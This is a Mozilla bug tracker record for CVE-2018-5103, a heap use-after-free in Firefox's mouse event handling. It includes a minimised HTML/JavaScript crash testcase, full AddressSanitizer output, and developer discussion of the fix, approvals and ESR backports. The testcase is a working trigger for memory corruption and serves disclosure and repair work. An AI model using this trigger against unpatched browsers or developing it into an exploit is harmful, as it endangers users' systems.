1423159 - (CVE-2018-5103) heap-use-after-free in mozilla::CreateMouseOrPointerWidgetEvent

Status: VERIFIED FIXED

(Core :: DOM: Events, defect)

Description

[Nils]

Attachment: crash.html (minimised testcase)

The following testcase crashes a release build of Firefox 57.0.2 (SourceStamp=15bb6c3fb5875c7f39aef036dd161df1407b5ee3). It requires the fuzzPriv extension and popups enabled for the page. The cursor needs to be somewhere over the page on loading the testcase.


crash.html:
<script>	
function spin () {
    var x=new XMLHttpRequest();
    x.open("POST","https://mozilla.org",false);
    try{x.send("X");}catch(e){}
}
function start() {
    setTimeout(fun0, 500);
}
function fun0() {
	o67=document.documentElement.onmouseout=fun1;
	o123=window.open('div.html','p','');
}
function fun1() {
	o123.close();
	spin();
    fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==21839==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d000278b30 at pc 0x7fdee55652eb bp 0x7ffdf7fefb30 sp 0x7ffdf7fefb28
READ of size 8 at 0x60d000278b30 thread T0
    #0 0x7fdee55652ea in nsCOMPtr_base::assign_with_AddRef(nsISupports*) /builds/worker/workspace/build/src/xpcom/base/nsCOMPtr.cpp:42:5
    #1 0x7fdee9fc856f in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:967:5
    #2 0x7fdee9fc856f in mozilla::CreateMouseOrPointerWidgetEvent(mozilla::WidgetMouseEvent*, mozilla::EventMessage, nsIContent*, nsAutoPtr<mozilla::WidgetMouseEvent>&) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:3964
    #3 0x7fdee9fc74ed in mozilla::EventStateManager::DispatchMouseOrPointerEvent(mozilla::WidgetMouseEvent*, mozilla::EventMessage, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4008:3
    #4 0x7fdee9fc9377 in mozilla::EventStateManager::NotifyMouseOut(mozilla::WidgetMouseEvent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4168:3
    #5 0x7fdee9fca62f in mozilla::EventStateManager::NotifyMouseOver(mozilla::WidgetMouseEvent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4222:3
    #6 0x7fdee9fca54c in mozilla::EventStateManager::NotifyMouseOver(mozilla::WidgetMouseEvent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4203:20
    #7 0x7fdee9faa584 in mozilla::EventStateManager::GenerateMouseEnterExit(mozilla::WidgetMouseEvent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4342:9
    #8 0x7fdee9fa511f in mozilla::EventStateManager::PreHandleEvent(nsPresContext*, mozilla::WidgetEvent*, nsIFrame*, nsIContent*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:732:5
    #9 0x7fdeec1aa788 in mozilla::PresShell::HandleEventInternal(mozilla::WidgetEvent*, nsEventStatus*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:8156:19
    #10 0x7fdeec1ac477 in mozilla::PresShell::HandlePositionedEvent(nsIFrame*, mozilla::WidgetGUIEvent*, nsEventStatus*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:7954:10
    #11 0x7fdeec1a77cd in mozilla::PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*, nsIContent**) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:7751:12
    #12 0x7fdeeb9a3313 in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /builds/worker/workspace/build/src/view/nsViewManager.cpp:812:14
    #13 0x7fdeec1806e6 in mozilla::PresShell::DispatchSynthMouseMove(mozilla::WidgetGUIEvent*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:3735:33
    #14 0x7fdeec194808 in mozilla::PresShell::ProcessSynthMouseMoveEvent(bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:5702:12
    #15 0x7fdeec1d79a7 in mozilla::PresShell::nsSynthMouseMoveEvent::WillRefresh(mozilla::TimeStamp) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/PresShell.h:649:16
    #16 0x7fdeec0fbf3b in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1886:12
    #17 0x7fdeec109f3e in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:337:13
    #18 0x7fdeec109f3e in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:307
    #19 0x7fdeec109a56 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:329:5
    #20 0x7fdeec10c4cb in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:770:5
    #21 0x7fdeec10c4cb in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:683
    #22 0x7fdeec107827 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:529:20
    #23 0x7fdee56dc935 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1039:14
    #24 0x7fdee56e209c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:521:10
    #25 0x7fdee645f131 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #26 0x7fdee63c387b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #27 0x7fdee63c387b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #28 0x7fdee63c387b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #29 0x7fdeeba25daf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #30 0x7fdeef1125f1 in nsAppStartup::Run() /builds/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:288:30
    #31 0x7fdeef2f186b in XREMain::XRE_mainRun() /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4703:22
    #32 0x7fdeef2f3463 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4867:8
    #33 0x7fdeef2f488b in XRE_main(int, char**, mozilla::BootstrapConfig const&) /builds/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4962:21
    #34 0x4ebea3 in do_main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22
    #35 0x4ebea3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:309
    #36 0x7fdf0191f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
    #37 0x41d9f8 in _start (/home/nils/fuzzer3/rel/firefox/firefox+0x41d9f8)

0x60d000278b30 is located 0 bytes inside of 136-byte region [0x60d000278b30,0x60d000278bb8)
freed by thread T0 here:
    #0 0x4bbf2b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7fdee557b367 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2704:25
    #2 0x7fdee55826bb in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2892:3
    #3 0x7fdee55826bb in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3909
    #4 0x7fdee5581c03 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3730:9
    #5 0x7fdee5585950 in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4299:21
    #6 0x7fdee826ab6d in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1480:3
    #7 0x7fdee7dbaa4b in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1434:3
    #8 0x7fdee5703f91 in NS_InvokeByIndex /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
    #9 0x7fdee6e0c610 in Invoke /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
    #10 0x7fdee6e0c610 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
    #11 0x7fdee6e0c610 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #12 0x7fdee6e139aa in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:929:12
    #13 0x7fdeef7d7d64 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #14 0x7fdeef7d7d64 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #15 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #16 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #17 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #18 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #19 0x7fdeef7d8852 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #20 0x7fdef0228a53 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2906:12
    #21 0x7fdee6d291ab in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:315:18
    #22 0x7fdeef7d7d64 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #23 0x7fdeef7d7d64 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #24 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #25 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #26 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #27 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #28 0x7fdeef7d8852 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #29 0x7fdef022a8db in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2965:12
    #30 0x7fdee96bc155 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #31 0x7fdeea0825d5 in Call<nsISupports *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #32 0x7fdeea0825d5 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #33 0x7fdeea04c359 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1112:51
    #34 0x7fdeea04e430 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1283:20
    #35 0x7fdeea02dc31 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #36 0x7fdeea0311d2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #37 0x7fdee9fc7618 in mozilla::EventStateManager::DispatchMouseOrPointerEvent(mozilla::WidgetMouseEvent*, mozilla::EventMessage, nsIContent*, nsIContent*) /builds/worker/workspace/build/src/dom/events/EventStateManager.cpp:4018:3

previously allocated by thread T0 here:
    #0 0x4bc27c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed88d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7fdeeb6e15a1 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7fdeeb6e15a1 in NS_NewXULElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&) /builds/worker/workspace/build/src/dom/xul/nsXULElement.cpp:268
    #4 0x7fdee829be60 in NS_NewElement(mozilla::dom::Element**, already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser, nsTSubstring<char16_t> const*) /builds/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:186:12
    #5 0x7fdee816b1d2 in nsDocument::CreateElementNS(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::dom::ElementCreationOptionsOrString const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:6073:8
    #6 0x7fdee96ff73a in mozilla::dom::DocumentBinding::createElementNS(JSContext*, JS::Handle<JSObject*>, nsIDocument*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1291:59
    #7 0x7fdee9c8b1e0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3041:13
    #8 0x7fdeef7d7d64 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #9 0x7fdeef7d7d64 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495
    #10 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #11 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #12 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #13 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #14 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #15 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #16 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #17 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #18 0x7fdeef7c1bc6 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:546:12
    #19 0x7fdeef7c1bc6 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3084
    #20 0x7fdeef7a9117 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:435:12
    #21 0x7fdeef7d7efc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:513:15
    #22 0x7fdeef7d8852 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:559:10
    #23 0x7fdef0228a53 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2906:12
    #24 0x7fdee6df24a3 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedJSClass.cpp:1318:23
    #25 0x7fdee570567a in PrepareAndDispatch /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:120:28
    #26 0x7fdee5704656 in SharedStub (/home/nils/fuzzer3/rel/firefox/libxul.so+0x20c7656)
    #27 0x7fdeee857ac4 in nsContentTreeOwner::ProvideWindow(mozIDOMWindowProxy*, unsigned int, bool, bool, bool, nsIURI*, nsTSubstring<char16_t> const&, nsTSubstring<char> const&, bool, bool*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/xpfe/appshell/nsContentTreeOwner.cpp:933:27
    #28 0x7fdeef253d8b in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:852:24
    #29 0x7fdeef25965f in OpenWindow2 /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:444:10
    #30 0x7fdeef25965f in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:416
    #31 0x7fdee7e5d025 in nsGlobalWindow::OpenInternal(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:12959:21
    #32 0x7fdee7e5b6ff in OpenJS /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:9013:10
    #33 0x7fdee7e5b6ff in nsGlobalWindow::OpenOuter(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8975
    #34 0x7fdee7e5bb8d in nsGlobalWindow::Open(nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8984:3
    #35 0x7fdee941d948 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle<JSObject*>, nsGlobalWindow*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2414:56
    #36 0x7fdee941bd65 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15530:13

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/xpcom/base/nsCOMPtr.cpp:42:5 in nsCOMPtr_base::assign_with_AddRef(nsISupports*)
Shadow bytes around the buggy address:
  0x0c1a80047110: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1a80047120: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c1a80047130: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80047140: fd fd fd fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c1a80047150: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
=>0x0c1a80047160: fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd
  0x0c1a80047170: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c1a80047180: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80047190: fd fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
  0x0c1a800471a0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c1a800471b0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==21839==ABORTING

Comment 1

[Nils]

Attachment: ASAN output

Comment 2

[Olli Pettay [:smaug][bugs@pettay.fi]]

Trying to reproduce.

Comment 3

[Olli Pettay [:smaug][bugs@pettay.fi]]

Nils, so div.html isn't needed? It is just some dummy url?
So far no luck reproducing.

Comment 4

[Olli Pettay [:smaug][bugs@pettay.fi]]

Btw, about:buildconfig gives nicely the link to the hg.mozilla.org

Comment 5

[Olli Pettay [:smaug][bugs@pettay.fi]]

I see at least one issue based on code inspection.

Comment 6

[Olli Pettay [:smaug][bugs@pettay.fi]]

Attachment: esm_relatedTarget_crash.diff

Ensure we keep the nodes alive long enough.

This patch is based on code inspection, since I haven't managed to reproduce the crash using the testcase.

Comment 7

[Nils]

Olli, yes it's not needed. Works without div.html from file: and http:.

about:buildconfig for some reason doesn't have the link on the treeherder asan builds :-/

Comment 8

[Olli Pettay [:smaug][bugs@pettay.fi]]

Comment on attachment 8935427 [details] [diff] [review]
esm_relatedTarget_crash.diff

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
It does pinpoint where the issue is, but triggering it might not be that easy.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Commit message could be
-m "Bug 1423159, ensure proper multiprocess mouse enter/exit handling, r=stone"

Which older supported branches are affected by this flaw?
I guess all, but depends on e10s being enabled.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
About to rebase for 52

How likely is this patch to cause regressions; how much testing does it need?
Very unlikely. Just keeping objects alive a tad longer

The fix is based on code inspection.

Comment 9

[Olli Pettay [:smaug][bugs@pettay.fi]]

Attachment: esm_relatedTarget_crash_esr52.diff

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration:
See comment 8
User impact if declined:
security sensitive crashes 
Fix Landed on Version:
not yet
Risk to taking this patch (and alternatives if risky): 
should be very safe

String or UUID changes made by this patch: 
NA

Comment 10

[Al Billings [:abillings - ex-MoCo]]

Comment on attachment 8935427 [details] [diff] [review]
esm_relatedTarget_crash.diff

Giving sec-approval+ and approval for beta.

Comment 11

[Ryan VanderMeulen [:RyanVM][PTO June 24-28]]

https://hg.mozilla.org/integration/mozilla-inbound/rev/689357a9394830406290ae1fb2200521a99bd7ad

Comment 12

[Ryan VanderMeulen [:RyanVM][PTO June 24-28]]

https://hg.mozilla.org/mozilla-central/rev/689357a93948

Comment 13

[Ryan VanderMeulen [:RyanVM][PTO June 24-28]]

https://hg.mozilla.org/releases/mozilla-beta/rev/7e553ba7c247

Comment 14

[Ritu Kothari (:ritu) (Inactive, please n-i to RyanVM, jcristau, or pascal)]

Comment on attachment 8935726 [details] [diff] [review]
esm_relatedTarget_crash_esr52.diff

Sec-high, ESR52+

Comment 15

[Ryan VanderMeulen [:RyanVM][PTO June 24-28]]

https://hg.mozilla.org/releases/mozilla-esr52/rev/6b4d3c5d5e51

Comment 16

[Iulia Cristescu, QA [:JuliaC] (away, please needinfo? cornel.ionce@softvision.ro)]

I didn't manage to reproduce the initial issue using the asan build mentioned in comment 0 or an old 59.0a1 asan build (e.g. from 2017-12-05) and the provided testcase, on Ubuntu 16.04 x64. Are there any additional steps or prerequisites that should be followed?

Comment 17

[Iulia Cristescu, QA [:JuliaC] (away, please needinfo? cornel.ionce@softvision.ro)]

Using a workaround provided by Matt Wobensmith, I managed to reproduce the initial issue using the asan build mentioned in comment 0. I can also confirm that the latest asan builds for Firefox beta [1] and Firefox release [2] are verified fixed, using Ubuntu 16.04 x64.

[1] firefox.linux64-asan-debug (20180130110808)
[2] firefox.linux64-asan-debug (20180129172351)

Comment 18

[Iulia Cristescu, QA [:JuliaC] (away, please needinfo? cornel.ionce@softvision.ro)]

Also, the latest asan build for Firefox esr52 (linux64-asan-debug 20180129200715) seems to be still affected, as the crash is triggered using the steps provided in comment 0 (see the output https://goo.gl/LELxQK).

Comment 19

[Olli Pettay [:smaug][bugs@pettay.fi]]

ok, that output isn't useful. Trying to reproduce on esr

Comment 20

[Olli Pettay [:smaug][bugs@pettay.fi]]

Struggling to get local asan-esr52 to even start. I get complains immediately.

Comment 21

[Olli Pettay [:smaug][bugs@pettay.fi]]

ok, I see the issue. What is there on esr52 is totally different. Even on different method.

Comment 22

[Olli Pettay [:smaug][bugs@pettay.fi]]

I filed bug 1434580

Comment 23

[Iulia Cristescu, QA [:JuliaC] (away, please needinfo? cornel.ionce@softvision.ro)]

Based on comment 21 and comment 22, I will mark firefox-esr52 as verified fixed.

Comment 24

[Liz Henry (:lizzard) (relman/hg->git project)]

Should this really be verified fixed for esr:58+  (i.e. 52.6.0) if we are only fixing the issue in bug 1434580 in the upcoming esr, 52.7.0?

Comment 25

[Olli Pettay [:smaug][bugs@pettay.fi]]

Yeah, I'm not really sure. There were basically two separate issues in EventStateManager code.
This bug fixes one issue, bug 1434580 another.